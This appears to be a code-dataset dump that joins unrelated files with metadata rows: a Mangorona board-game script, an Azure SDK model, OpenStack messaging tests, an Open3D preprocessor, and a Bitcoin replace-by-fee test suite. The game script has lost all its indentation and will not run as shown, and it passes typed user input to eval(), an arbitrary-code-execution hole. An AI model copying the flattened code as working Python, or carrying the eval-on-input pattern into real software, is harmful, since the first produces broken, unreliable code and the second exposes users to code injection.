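# moves and show the result. Player symbols mirror the PLAYERS tuples used in
# MachineMachine() and TestvsMachine().
def _example_turn():
    m = Mangorona(('a', 'b', ' '), 'star', (5, 9), None)
    initial, final = random.choice(AllowableMovement(m, 'a').Move(maximum=True))
    m.Move('a', initial, final)
    print(Board(m).Display())
    print('captured by a:', m.gain['a'])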
def MachineMachine():
LATTICE = 'star' ##, 'diamond'
DIMENSION = (5,11)
PLAYERS = 'a', 'b', ' '
##mc = Mangorona(PLAYERS,'cubic', DIMENSION, None)
##maximum=True
##getall=True
mc = Mangorona(PLAYERS,'diamond', (7,11), None)
maximum=True
getall=False
t = PLAYERS[:2]
tab = 0
print(Board(mc).Display())
while True:
try:
turn = t[tab%2]
movable = AllowableMovement(mc, turn).Move(maximum=maximum, getall=getall)
machine = random.choice(movable)
print(turn, 'move:', machine[0], machine[1])
mc.Move(turn, machine[0], machine[1])
print(Board(mc).Display())
print(mc.gain['a'], mc.gain['b']) ##, t1-t0
print()
tab += 1
except IllegalMove:
exc = traceback.format_exception(*sys.exc_info())[-1]
print(exc)
except NoMoreMove:
exc = traceback.format_exception(*sys.exc_info())[-1]
print(exc)
print('winner:', mc.Winner())
break
def TestvsMachine():
LATTICE = 'star'
DIMENSION = 5, 9
PLAYERS = 'a', 'b', ' '
machineplayer = PLAYERS[0]
mc = Mangorona(PLAYERS,LATTICE, DIMENSION, None)
maximum=True
getall=False
t = PLAYERS[:2]
tab = 0
print(Board(mc).Display())
while True:
try:
turn = t[tab%2]
movable = AllowableMovement(mc, turn).Move(maximum=maximum, getall=getall)
if turn == machineplayer:
machine = random.choice(movable)
print(turn, 'move:', machine[0], machine[1])
mc.Move(turn, machine[0], machine[1])
print(Board(mc).Display())
print(mc.gain['a'], mc.gain['b']) ##, t1-t0
print()
tab += 1
else:
h = input("type:'?' for movable, 'z' for Zero, 'h' for rules\nyour move - :")
if h == '?':
print(mc.MovablePawn(turn))
elif h == 'z':
print(mc.Zero())
elif h == 'h':
print(__doc__)
else:
human = eval(h)
if human not in movable:
raise IllegalMove('not allowable move')
mc.Move(turn, human[0], human[1])
print(Board(mc).Display())
tab += 1
except IllegalMove:
exc = traceback.format_exception(*sys.exc_info())[-1]
print(exc)
except NoMoreMove:
exc = traceback.format_exception(*sys.exc_info())[-1]
print(exc)
print('winner:', mc.Winner())
break
except KeyboardInterrupt:
raise SystemExit
except:
traceback.print_exc()
__version__ = '3k-0.0.0'
__author__ = 'nirinA'
__date__ = 'Sat May 10 21:52:15 2008'
| unlicense | 4,551,880,349,135,935,500 | 33.869565 | 93 | 0.488622 | false |
rjschwei/azure-sdk-for-python | azure-mgmt-powerbiembedded/azure/mgmt/powerbiembedded/models/azure_sku.py | 1 | 1111 | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from msrest.serialization import Model
class AzureSku(Model):
"""AzureSku.
Variables are only populated by the server, and will be ignored when
sending a request.
:ivar name: SKU name. Default value: "S1" .
:vartype name: str
:ivar tier: SKU tier. Default value: "Standard" .
:vartype tier: str
"""
_validation = {
'name': {'required': True, 'constant': True},
'tier': {'required': True, 'constant': True},
}
_attribute_map = {
'name': {'key': 'name', 'type': 'str'},
'tier': {'key': 'tier', 'type': 'str'},
}
name = "S1"
tier = "Standard"
| mit | 1,389,177,205,370,494,500 | 27.487179 | 76 | 0.540954 | false |
briancurtin/python-openstacksdk | openstack/tests/unit/message/v2/test_proxy.py | 1 | 9468 | # Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import mock
from openstack.message.v2 import _proxy
from openstack.message.v2 import claim
from openstack.message.v2 import message
from openstack.message.v2 import queue
from openstack.message.v2 import subscription
from openstack import proxy2 as proxy_base
from openstack.tests.unit import test_proxy_base2
QUEUE_NAME = 'test_queue'
class TestMessageProxy(test_proxy_base2.TestProxyBase):
def setUp(self):
super(TestMessageProxy, self).setUp()
self.proxy = _proxy.Proxy(self.session)
def test_queue_create(self):
self.verify_create(self.proxy.create_queue, queue.Queue)
def test_queue_get(self):
self.verify_get(self.proxy.get_queue, queue.Queue)
def test_queues(self):
self.verify_list(self.proxy.queues, queue.Queue, paginated=True)
def test_queue_delete(self):
self.verify_delete(self.proxy.delete_queue, queue.Queue, False)
def test_queue_delete_ignore(self):
self.verify_delete(self.proxy.delete_queue, queue.Queue, True)
@mock.patch.object(proxy_base.BaseProxy, '_get_resource')
def test_message_post(self, mock_get_resource):
message_obj = message.Message(queue_name="test_queue")
mock_get_resource.return_value = message_obj
self._verify("openstack.message.v2.message.Message.post",
self.proxy.post_message,
method_args=["test_queue", ["msg1", "msg2"]],
expected_args=[["msg1", "msg2"]])
mock_get_resource.assert_called_once_with(message.Message, None,
queue_name="test_queue")
@mock.patch.object(proxy_base.BaseProxy, '_get_resource')
def test_message_get(self, mock_get_resource):
mock_get_resource.return_value = "resource_or_id"
self._verify2("openstack.proxy2.BaseProxy._get",
self.proxy.get_message,
method_args=["test_queue", "resource_or_id"],
expected_args=[message.Message, "resource_or_id"])
mock_get_resource.assert_called_once_with(message.Message,
"resource_or_id",
queue_name="test_queue")
def test_messages(self):
self.verify_list(self.proxy.messages, message.Message,
paginated=True, method_args=["test_queue"],
expected_kwargs={"queue_name": "test_queue"})
@mock.patch.object(proxy_base.BaseProxy, '_get_resource')
def test_message_delete(self, mock_get_resource):
fake_message = mock.Mock()
fake_message.id = "message_id"
mock_get_resource.return_value = fake_message
self._verify2("openstack.proxy2.BaseProxy._delete",
self.proxy.delete_message,
method_args=["test_queue", "resource_or_id", None,
False],
expected_args=[message.Message,
fake_message],
expected_kwargs={"ignore_missing": False})
self.assertIsNone(fake_message.claim_id)
mock_get_resource.assert_called_once_with(message.Message,
"resource_or_id",
queue_name="test_queue")
@mock.patch.object(proxy_base.BaseProxy, '_get_resource')
def test_message_delete_claimed(self, mock_get_resource):
fake_message = mock.Mock()
fake_message.id = "message_id"
mock_get_resource.return_value = fake_message
self._verify2("openstack.proxy2.BaseProxy._delete",
self.proxy.delete_message,
method_args=["test_queue", "resource_or_id", "claim_id",
False],
expected_args=[message.Message,
fake_message],
expected_kwargs={"ignore_missing": False})
self.assertEqual("claim_id", fake_message.claim_id)
mock_get_resource.assert_called_once_with(message.Message,
"resource_or_id",
queue_name="test_queue")
@mock.patch.object(proxy_base.BaseProxy, '_get_resource')
def test_message_delete_ignore(self, mock_get_resource):
fake_message = mock.Mock()
fake_message.id = "message_id"
mock_get_resource.return_value = fake_message
self._verify2("openstack.proxy2.BaseProxy._delete",
self.proxy.delete_message,
method_args=["test_queue", "resource_or_id", None,
True],
expected_args=[message.Message,
fake_message],
expected_kwargs={"ignore_missing": True})
self.assertIsNone(fake_message.claim_id)
mock_get_resource.assert_called_once_with(message.Message,
"resource_or_id",
queue_name="test_queue")
def test_subscription_create(self):
self._verify("openstack.message.v2.subscription.Subscription.create",
self.proxy.create_subscription,
method_args=["test_queue"])
@mock.patch.object(proxy_base.BaseProxy, '_get_resource')
def test_subscription_get(self, mock_get_resource):
mock_get_resource.return_value = "resource_or_id"
self._verify2("openstack.proxy2.BaseProxy._get",
self.proxy.get_subscription,
method_args=["test_queue", "resource_or_id"],
expected_args=[subscription.Subscription,
"resource_or_id"])
mock_get_resource.assert_called_once_with(
subscription.Subscription, "resource_or_id",
queue_name="test_queue")
def test_subscriptions(self):
self.verify_list(self.proxy.subscriptions, subscription.Subscription,
paginated=True, method_args=["test_queue"],
expected_kwargs={"queue_name": "test_queue"})
@mock.patch.object(proxy_base.BaseProxy, '_get_resource')
def test_subscription_delete(self, mock_get_resource):
mock_get_resource.return_value = "resource_or_id"
self.verify_delete(self.proxy.delete_subscription,
subscription.Subscription, False,
["test_queue", "resource_or_id"])
mock_get_resource.assert_called_once_with(
subscription.Subscription, "resource_or_id",
queue_name="test_queue")
@mock.patch.object(proxy_base.BaseProxy, '_get_resource')
def test_subscription_delete_ignore(self, mock_get_resource):
mock_get_resource.return_value = "resource_or_id"
self.verify_delete(self.proxy.delete_subscription,
subscription.Subscription, True,
["test_queue", "resource_or_id"])
mock_get_resource.assert_called_once_with(
subscription.Subscription, "resource_or_id",
queue_name="test_queue")
def test_claim_create(self):
self._verify("openstack.message.v2.claim.Claim.create",
self.proxy.create_claim,
method_args=["test_queue"])
def test_claim_get(self):
self._verify2("openstack.proxy2.BaseProxy._get",
self.proxy.get_claim,
method_args=["test_queue", "resource_or_id"],
expected_args=[claim.Claim,
"resource_or_id"],
expected_kwargs={"queue_name": "test_queue"})
def test_claim_update(self):
self._verify2("openstack.proxy2.BaseProxy._update",
self.proxy.update_claim,
method_args=["test_queue", "resource_or_id"],
method_kwargs={"k1": "v1"},
expected_args=[claim.Claim,
"resource_or_id"],
expected_kwargs={"queue_name": "test_queue",
"k1": "v1"})
def test_claim_delete(self):
self.verify_delete(self.proxy.delete_claim,
claim.Claim, False,
["test_queue", "resource_or_id"],
expected_kwargs={"queue_name": "test_queue"})
def test_claim_delete_ignore(self):
self.verify_delete(self.proxy.delete_claim,
claim.Claim, True,
["test_queue", "resource_or_id"],
expected_kwargs={"queue_name": "test_queue"})
| apache-2.0 | 4,928,571,807,809,514,000 | 46.577889 | 78 | 0.560097 | false |
vjlux/luxlib | LuxSynth/LuxSynth/LuxPreprocessor.py | 1 | 1130 | #!/usr/bin/env python3
## Copyright (c) MIT. All rights reserved.
## lux ([email protected]) 2016
############################################################
# Imports
############################################################
import logging
import LuxImage
import open3d as o3d
import numpy as np
############################################################
# Globals
############################################################
############################################################
# Classes
############################################################
class LuxPreprocessor(object):
"""Preprocessor class for raw data loading."""
m_outputPath = "./";
m_inputPath = "./";
def __init__(
self,
p_inputPath,
p_outputPath):
        self.m_inputPath = p_inputPath;
        self.m_outputPath = p_outputPath;
def LoadDepthFromRGB24bitImage(self, p_depthImageFileName):
#depth = np.array([]);
#color_raw = o3d.io.read_image("../../TestData/RGBD/color/00000.jpg")
depth_raw = o3d.io.read_image(p_depthImageFileName);
return depth_raw; | mit | 3,467,147,251,003,499,000 | 24.704545 | 77 | 0.39646 | false |
chaincoin/chaincoin | qa/rpc-tests/replace-by-fee.py | 1 | 22023 | #!/usr/bin/env python3
# Copyright (c) 2014-2016 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Test replace by fee code
#
from test_framework.test_framework import BitcoinTestFramework
from test_framework.util import *
from test_framework.script import *
from test_framework.mininode import *
MAX_REPLACEMENT_LIMIT = 100
def txToHex(tx):
return bytes_to_hex_str(tx.serialize())
def make_utxo(node, amount, confirmed=True, scriptPubKey=CScript([1])):
"""Create a txout with a given amount and scriptPubKey
Mines coins as needed.
confirmed - txouts created will be confirmed in the blockchain;
unconfirmed otherwise.
"""
fee = 1*COIN
while node.getbalance() < satoshi_round((amount + fee)/COIN):
node.generate(100)
#print (node.getbalance(), amount, fee)
new_addr = node.getnewaddress()
#print new_addr
txid = node.sendtoaddress(new_addr, satoshi_round((amount+fee)/COIN))
tx1 = node.getrawtransaction(txid, 1)
txid = int(txid, 16)
i = None
for i, txout in enumerate(tx1['vout']):
#print i, txout['scriptPubKey']['addresses']
if txout['scriptPubKey']['addresses'] == [new_addr]:
#print i
break
assert i is not None
tx2 = CTransaction()
tx2.vin = [CTxIn(COutPoint(txid, i))]
tx2.vout = [CTxOut(amount, scriptPubKey)]
tx2.rehash()
signed_tx = node.signrawtransaction(txToHex(tx2))
txid = node.sendrawtransaction(signed_tx['hex'], True)
# If requested, ensure txouts are confirmed.
if confirmed:
mempool_size = len(node.getrawmempool())
while mempool_size > 0:
node.generate(1)
new_size = len(node.getrawmempool())
# Error out if we have something stuck in the mempool, as this
# would likely be a bug.
assert(new_size < mempool_size)
mempool_size = new_size
return COutPoint(int(txid, 16), 0)
class ReplaceByFeeTest(BitcoinTestFramework):
def __init__(self):
super().__init__()
self.num_nodes = 1
self.setup_clean_chain = False
def setup_network(self):
self.nodes = []
self.nodes.append(start_node(0, self.options.tmpdir, ["-maxorphantx=1000", "-debug",
"-relaypriority=0", "-whitelist=127.0.0.1",
"-limitancestorcount=50",
"-limitancestorsize=101",
"-limitdescendantcount=200",
"-limitdescendantsize=101"
]))
self.is_network_split = False
def run_test(self):
make_utxo(self.nodes[0], 1*COIN)
print("Running test simple doublespend...")
self.test_simple_doublespend()
print("Running test doublespend chain...")
self.test_doublespend_chain()
print("Running test doublespend tree...")
self.test_doublespend_tree()
print("Running test replacement feeperkb...")
self.test_replacement_feeperkb()
print("Running test spends of conflicting outputs...")
self.test_spends_of_conflicting_outputs()
print("Running test new unconfirmed inputs...")
self.test_new_unconfirmed_inputs()
print("Running test too many replacements...")
self.test_too_many_replacements()
print("Running test opt-in...")
self.test_opt_in()
print("Running test prioritised transactions...")
self.test_prioritised_transactions()
print("Passed\n")
def test_simple_doublespend(self):
"""Simple doublespend"""
tx0_outpoint = make_utxo(self.nodes[0], int(1.1*COIN))
tx1a = CTransaction()
tx1a.vin = [CTxIn(tx0_outpoint, nSequence=0)]
tx1a.vout = [CTxOut(1*COIN, CScript([b'a']))]
tx1a_hex = txToHex(tx1a)
tx1a_txid = self.nodes[0].sendrawtransaction(tx1a_hex, True)
# Should fail because we haven't changed the fee
tx1b = CTransaction()
tx1b.vin = [CTxIn(tx0_outpoint, nSequence=0)]
tx1b.vout = [CTxOut(1*COIN, CScript([b'b']))]
tx1b_hex = txToHex(tx1b)
try:
tx1b_txid = self.nodes[0].sendrawtransaction(tx1b_hex, True)
except JSONRPCException as exp:
assert_equal(exp.error['code'], -26) # insufficient fee
else:
assert(False)
# Extra 0.1 BTC fee
tx1b = CTransaction()
tx1b.vin = [CTxIn(tx0_outpoint, nSequence=0)]
tx1b.vout = [CTxOut(int(0.9*COIN), CScript([b'b']))]
tx1b_hex = txToHex(tx1b)
tx1b_txid = self.nodes[0].sendrawtransaction(tx1b_hex, True)
mempool = self.nodes[0].getrawmempool()
assert (tx1a_txid not in mempool)
assert (tx1b_txid in mempool)
assert_equal(tx1b_hex, self.nodes[0].getrawtransaction(tx1b_txid))
def test_doublespend_chain(self):
"""Doublespend of a long chain"""
initial_nValue = 50*COIN
tx0_outpoint = make_utxo(self.nodes[0], initial_nValue)
prevout = tx0_outpoint
remaining_value = initial_nValue
chain_txids = []
while remaining_value > 10*COIN:
remaining_value -= 1*COIN
tx = CTransaction()
tx.vin = [CTxIn(prevout, nSequence=0)]
tx.vout = [CTxOut(remaining_value, CScript([1]))]
tx_hex = txToHex(tx)
txid = self.nodes[0].sendrawtransaction(tx_hex, True)
chain_txids.append(txid)
prevout = COutPoint(int(txid, 16), 0)
# Whether the double-spend is allowed is evaluated by including all
# child fees - 40 BTC - so this attempt is rejected.
dbl_tx = CTransaction()
dbl_tx.vin = [CTxIn(tx0_outpoint, nSequence=0)]
dbl_tx.vout = [CTxOut(initial_nValue - 30*COIN, CScript([1]))]
dbl_tx_hex = txToHex(dbl_tx)
try:
self.nodes[0].sendrawtransaction(dbl_tx_hex, True)
except JSONRPCException as exp:
assert_equal(exp.error['code'], -26) # insufficient fee
else:
assert(False) # transaction mistakenly accepted!
# Accepted with sufficient fee
dbl_tx = CTransaction()
dbl_tx.vin = [CTxIn(tx0_outpoint, nSequence=0)]
dbl_tx.vout = [CTxOut(1*COIN, CScript([1]))]
dbl_tx_hex = txToHex(dbl_tx)
self.nodes[0].sendrawtransaction(dbl_tx_hex, True)
mempool = self.nodes[0].getrawmempool()
for doublespent_txid in chain_txids:
assert(doublespent_txid not in mempool)
def test_doublespend_tree(self):
"""Doublespend of a big tree of transactions"""
initial_nValue = 50*COIN
tx0_outpoint = make_utxo(self.nodes[0], initial_nValue)
def branch(prevout, initial_value, max_txs, tree_width=5, fee=0.0001*COIN, _total_txs=None):
if _total_txs is None:
_total_txs = [0]
if _total_txs[0] >= max_txs:
return
txout_value = (initial_value - fee) // tree_width
if txout_value < fee:
return
vout = [CTxOut(txout_value, CScript([i+1]))
for i in range(tree_width)]
tx = CTransaction()
tx.vin = [CTxIn(prevout, nSequence=0)]
tx.vout = vout
tx_hex = txToHex(tx)
assert(len(tx.serialize()) < 100000)
txid = self.nodes[0].sendrawtransaction(tx_hex, True)
yield tx
_total_txs[0] += 1
txid = int(txid, 16)
for i, txout in enumerate(tx.vout):
for x in branch(COutPoint(txid, i), txout_value,
max_txs,
tree_width=tree_width, fee=fee,
_total_txs=_total_txs):
yield x
fee = int(0.0001*COIN)
n = MAX_REPLACEMENT_LIMIT
tree_txs = list(branch(tx0_outpoint, initial_nValue, n, fee=fee))
assert_equal(len(tree_txs), n)
# Attempt double-spend, will fail because too little fee paid
dbl_tx = CTransaction()
dbl_tx.vin = [CTxIn(tx0_outpoint, nSequence=0)]
dbl_tx.vout = [CTxOut(initial_nValue - fee*n, CScript([1]))]
dbl_tx_hex = txToHex(dbl_tx)
try:
self.nodes[0].sendrawtransaction(dbl_tx_hex, True)
except JSONRPCException as exp:
assert_equal(exp.error['code'], -26) # insufficient fee
else:
assert(False)
# 1 BTC fee is enough
dbl_tx = CTransaction()
dbl_tx.vin = [CTxIn(tx0_outpoint, nSequence=0)]
dbl_tx.vout = [CTxOut(initial_nValue - fee*n - 1*COIN, CScript([1]))]
dbl_tx_hex = txToHex(dbl_tx)
self.nodes[0].sendrawtransaction(dbl_tx_hex, True)
mempool = self.nodes[0].getrawmempool()
for tx in tree_txs:
tx.rehash()
assert (tx.hash not in mempool)
# Try again, but with more total transactions than the "max txs
# double-spent at once" anti-DoS limit.
for n in (MAX_REPLACEMENT_LIMIT+1, MAX_REPLACEMENT_LIMIT*2):
fee = int(0.0001*COIN)
tx0_outpoint = make_utxo(self.nodes[0], initial_nValue)
tree_txs = list(branch(tx0_outpoint, initial_nValue, n, fee=fee))
assert_equal(len(tree_txs), n)
dbl_tx = CTransaction()
dbl_tx.vin = [CTxIn(tx0_outpoint, nSequence=0)]
dbl_tx.vout = [CTxOut(initial_nValue - 2*fee*n, CScript([1]))]
dbl_tx_hex = txToHex(dbl_tx)
try:
self.nodes[0].sendrawtransaction(dbl_tx_hex, True)
except JSONRPCException as exp:
assert_equal(exp.error['code'], -26)
assert_equal("too many potential replacements" in exp.error['message'], True)
else:
assert(False)
for tx in tree_txs:
tx.rehash()
self.nodes[0].getrawtransaction(tx.hash)
def test_replacement_feeperkb(self):
"""Replacement requires fee-per-KB to be higher"""
tx0_outpoint = make_utxo(self.nodes[0], int(1.1*COIN))
tx1a = CTransaction()
tx1a.vin = [CTxIn(tx0_outpoint, nSequence=0)]
tx1a.vout = [CTxOut(1*COIN, CScript([b'a']))]
tx1a_hex = txToHex(tx1a)
tx1a_txid = self.nodes[0].sendrawtransaction(tx1a_hex, True)
# Higher fee, but the fee per KB is much lower, so the replacement is
# rejected.
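# (tx1b spends the same 1.1 BTC input and pays ~1.099 BTC in fees, but it
# carries ~999 kB of script data, so its fee-per-kB stays below tx1a's.)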
tx1b = CTransaction()
tx1b.vin = [CTxIn(tx0_outpoint, nSequence=0)]
tx1b.vout = [CTxOut(int(0.001*COIN), CScript([b'a'*999000]))]
tx1b_hex = txToHex(tx1b)
try:
tx1b_txid = self.nodes[0].sendrawtransaction(tx1b_hex, True)
except JSONRPCException as exp:
assert_equal(exp.error['code'], -26) # insufficient fee
else:
assert(False)
def test_spends_of_conflicting_outputs(self):
"""Replacements that spend conflicting tx outputs are rejected"""
utxo1 = make_utxo(self.nodes[0], int(1.2*COIN))
utxo2 = make_utxo(self.nodes[0], 3*COIN)
tx1a = CTransaction()
tx1a.vin = [CTxIn(utxo1, nSequence=0)]
tx1a.vout = [CTxOut(int(1.1*COIN), CScript([b'a']))]
tx1a_hex = txToHex(tx1a)
tx1a_txid = self.nodes[0].sendrawtransaction(tx1a_hex, True)
tx1a_txid = int(tx1a_txid, 16)
# Direct spend an output of the transaction we're replacing.
tx2 = CTransaction()
tx2.vin = [CTxIn(utxo1, nSequence=0), CTxIn(utxo2, nSequence=0)]
tx2.vin.append(CTxIn(COutPoint(tx1a_txid, 0), nSequence=0))
tx2.vout = tx1a.vout
tx2_hex = txToHex(tx2)
try:
tx2_txid = self.nodes[0].sendrawtransaction(tx2_hex, True)
except JSONRPCException as exp:
assert_equal(exp.error['code'], -26)
else:
assert(False)
# Spend tx1a's output to test the indirect case.
tx1b = CTransaction()
tx1b.vin = [CTxIn(COutPoint(tx1a_txid, 0), nSequence=0)]
tx1b.vout = [CTxOut(1*COIN, CScript([b'a']))]
tx1b_hex = txToHex(tx1b)
tx1b_txid = self.nodes[0].sendrawtransaction(tx1b_hex, True)
tx1b_txid = int(tx1b_txid, 16)
tx2 = CTransaction()
tx2.vin = [CTxIn(utxo1, nSequence=0), CTxIn(utxo2, nSequence=0),
CTxIn(COutPoint(tx1b_txid, 0))]
tx2.vout = tx1a.vout
tx2_hex = txToHex(tx2)
try:
tx2_txid = self.nodes[0].sendrawtransaction(tx2_hex, True)
except JSONRPCException as exp:
assert_equal(exp.error['code'], -26)
else:
assert(False)
def test_new_unconfirmed_inputs(self):
"""Replacements that add new unconfirmed inputs are rejected"""
confirmed_utxo = make_utxo(self.nodes[0], int(1.1*COIN))
unconfirmed_utxo = make_utxo(self.nodes[0], int(0.1*COIN), False)
tx1 = CTransaction()
tx1.vin = [CTxIn(confirmed_utxo)]
tx1.vout = [CTxOut(1*COIN, CScript([b'a']))]
tx1_hex = txToHex(tx1)
tx1_txid = self.nodes[0].sendrawtransaction(tx1_hex, True)
tx2 = CTransaction()
tx2.vin = [CTxIn(confirmed_utxo), CTxIn(unconfirmed_utxo)]
tx2.vout = tx1.vout
tx2_hex = txToHex(tx2)
try:
tx2_txid = self.nodes[0].sendrawtransaction(tx2_hex, True)
except JSONRPCException as exp:
assert_equal(exp.error['code'], -26)
else:
assert(False)
def test_too_many_replacements(self):
"""Replacements that evict too many transactions are rejected"""
# Try directly replacing more than MAX_REPLACEMENT_LIMIT
# transactions
# Start by creating a single transaction with many outputs
initial_nValue = 10*COIN
utxo = make_utxo(self.nodes[0], initial_nValue)
fee = int(0.0001*COIN)
split_value = int((initial_nValue-fee)/(MAX_REPLACEMENT_LIMIT+1))
actual_fee = initial_nValue - split_value*(MAX_REPLACEMENT_LIMIT+1)
outputs = []
for i in range(MAX_REPLACEMENT_LIMIT+1):
outputs.append(CTxOut(split_value, CScript([1])))
splitting_tx = CTransaction()
splitting_tx.vin = [CTxIn(utxo, nSequence=0)]
splitting_tx.vout = outputs
splitting_tx_hex = txToHex(splitting_tx)
txid = self.nodes[0].sendrawtransaction(splitting_tx_hex, True)
txid = int(txid, 16)
# Now spend each of those outputs individually
for i in range(MAX_REPLACEMENT_LIMIT+1):
tx_i = CTransaction()
tx_i.vin = [CTxIn(COutPoint(txid, i), nSequence=0)]
tx_i.vout = [CTxOut(split_value-fee, CScript([b'a']))]
tx_i_hex = txToHex(tx_i)
self.nodes[0].sendrawtransaction(tx_i_hex, True)
# Now create doublespend of the whole lot; should fail.
# Need a big enough fee to cover all spending transactions and have
# a higher fee rate
double_spend_value = (split_value-100*fee)*(MAX_REPLACEMENT_LIMIT+1)
inputs = []
for i in range(MAX_REPLACEMENT_LIMIT+1):
inputs.append(CTxIn(COutPoint(txid, i), nSequence=0))
double_tx = CTransaction()
double_tx.vin = inputs
double_tx.vout = [CTxOut(double_spend_value, CScript([b'a']))]
double_tx_hex = txToHex(double_tx)
try:
self.nodes[0].sendrawtransaction(double_tx_hex, True)
except JSONRPCException as exp:
assert_equal(exp.error['code'], -26)
assert_equal("too many potential replacements" in exp.error['message'], True)
else:
assert(False)
# If we remove an input, it should pass
double_tx = CTransaction()
double_tx.vin = inputs[0:-1]
double_tx.vout = [CTxOut(double_spend_value, CScript([b'a']))]
double_tx_hex = txToHex(double_tx)
self.nodes[0].sendrawtransaction(double_tx_hex, True)
def test_opt_in(self):
""" Replacing should only work if orig tx opted in """
tx0_outpoint = make_utxo(self.nodes[0], int(1.1*COIN))
# Create a non-opting in transaction
tx1a = CTransaction()
tx1a.vin = [CTxIn(tx0_outpoint, nSequence=0xffffffff)]
tx1a.vout = [CTxOut(1*COIN, CScript([b'a']))]
tx1a_hex = txToHex(tx1a)
tx1a_txid = self.nodes[0].sendrawtransaction(tx1a_hex, True)
# Shouldn't be able to double-spend
tx1b = CTransaction()
tx1b.vin = [CTxIn(tx0_outpoint, nSequence=0)]
tx1b.vout = [CTxOut(int(0.9*COIN), CScript([b'b']))]
tx1b_hex = txToHex(tx1b)
try:
tx1b_txid = self.nodes[0].sendrawtransaction(tx1b_hex, True)
except JSONRPCException as exp:
assert_equal(exp.error['code'], -26)
else:
print(tx1b_txid)
assert(False)
tx1_outpoint = make_utxo(self.nodes[0], int(1.1*COIN))
# Create a different non-opting in transaction
tx2a = CTransaction()
tx2a.vin = [CTxIn(tx1_outpoint, nSequence=0xfffffffe)]
tx2a.vout = [CTxOut(1*COIN, CScript([b'a']))]
tx2a_hex = txToHex(tx2a)
tx2a_txid = self.nodes[0].sendrawtransaction(tx2a_hex, True)
# Still shouldn't be able to double-spend
tx2b = CTransaction()
tx2b.vin = [CTxIn(tx1_outpoint, nSequence=0)]
tx2b.vout = [CTxOut(int(0.9*COIN), CScript([b'b']))]
tx2b_hex = txToHex(tx2b)
try:
tx2b_txid = self.nodes[0].sendrawtransaction(tx2b_hex, True)
except JSONRPCException as exp:
assert_equal(exp.error['code'], -26)
else:
assert(False)
# Now create a new transaction that spends from tx1a and tx2a
# opt-in on one of the inputs
# Transaction should be replaceable on either input
tx1a_txid = int(tx1a_txid, 16)
tx2a_txid = int(tx2a_txid, 16)
tx3a = CTransaction()
tx3a.vin = [CTxIn(COutPoint(tx1a_txid, 0), nSequence=0xffffffff),
CTxIn(COutPoint(tx2a_txid, 0), nSequence=0xfffffffd)]
tx3a.vout = [CTxOut(int(0.9*COIN), CScript([b'c'])), CTxOut(int(0.9*COIN), CScript([b'd']))]
tx3a_hex = txToHex(tx3a)
self.nodes[0].sendrawtransaction(tx3a_hex, True)
tx3b = CTransaction()
tx3b.vin = [CTxIn(COutPoint(tx1a_txid, 0), nSequence=0)]
tx3b.vout = [CTxOut(int(0.5*COIN), CScript([b'e']))]
tx3b_hex = txToHex(tx3b)
tx3c = CTransaction()
tx3c.vin = [CTxIn(COutPoint(tx2a_txid, 0), nSequence=0)]
tx3c.vout = [CTxOut(int(0.5*COIN), CScript([b'f']))]
tx3c_hex = txToHex(tx3c)
self.nodes[0].sendrawtransaction(tx3b_hex, True)
# If tx3b was accepted, tx3c won't look like a replacement,
# but make sure it is accepted anyway
self.nodes[0].sendrawtransaction(tx3c_hex, True)
def test_prioritised_transactions(self):
# Ensure that fee deltas used via prioritisetransaction are
# correctly used by replacement logic
# 1. Check that feeperkb uses modified fees
tx0_outpoint = make_utxo(self.nodes[0], int(1.1*COIN))
tx1a = CTransaction()
tx1a.vin = [CTxIn(tx0_outpoint, nSequence=0)]
tx1a.vout = [CTxOut(1*COIN, CScript([b'a']))]
tx1a_hex = txToHex(tx1a)
tx1a_txid = self.nodes[0].sendrawtransaction(tx1a_hex, True)
# Higher fee, but the actual fee per KB is much lower.
tx1b = CTransaction()
tx1b.vin = [CTxIn(tx0_outpoint, nSequence=0)]
tx1b.vout = [CTxOut(int(0.001*COIN), CScript([b'a'*740000]))]
tx1b_hex = txToHex(tx1b)
# Verify tx1b cannot replace tx1a.
try:
tx1b_txid = self.nodes[0].sendrawtransaction(tx1b_hex, True)
except JSONRPCException as exp:
assert_equal(exp.error['code'], -26)
else:
assert(False)
# Use prioritisetransaction to set tx1a's fee to 0.
self.nodes[0].prioritisetransaction(txid=tx1a_txid, fee_delta=int(-0.1*COIN))
# Now tx1b should be able to replace tx1a
tx1b_txid = self.nodes[0].sendrawtransaction(tx1b_hex, True)
assert(tx1b_txid in self.nodes[0].getrawmempool())
# 2. Check that absolute fee checks use modified fee.
tx1_outpoint = make_utxo(self.nodes[0], int(1.1*COIN))
tx2a = CTransaction()
tx2a.vin = [CTxIn(tx1_outpoint, nSequence=0)]
tx2a.vout = [CTxOut(1*COIN, CScript([b'a']))]
tx2a_hex = txToHex(tx2a)
tx2a_txid = self.nodes[0].sendrawtransaction(tx2a_hex, True)
# Lower fee, but we'll prioritise it
tx2b = CTransaction()
tx2b.vin = [CTxIn(tx1_outpoint, nSequence=0)]
tx2b.vout = [CTxOut(int(1.01*COIN), CScript([b'a']))]
tx2b.rehash()
tx2b_hex = txToHex(tx2b)
# Verify tx2b cannot replace tx2a.
try:
tx2b_txid = self.nodes[0].sendrawtransaction(tx2b_hex, True)
except JSONRPCException as exp:
assert_equal(exp.error['code'], -26)
else:
assert(False)
# Now prioritise tx2b to have a higher modified fee
self.nodes[0].prioritisetransaction(txid=tx2b.hash, fee_delta=int(0.1*COIN))
# tx2b should now be accepted
tx2b_txid = self.nodes[0].sendrawtransaction(tx2b_hex, True)
assert(tx2b_txid in self.nodes[0].getrawmempool())
if __name__ == '__main__':
ReplaceByFeeTest().main()
| mit | 5,439,684,677,800,086,000 | 36.327119 | 105 | 0.5823 | false |
pytorch/fairseq | examples/multilingual/data_scripts/utils/fasttext_multi_filter.py | 1 | 2340 | # Copyright (c) Facebook, Inc. and its affiliates.
#
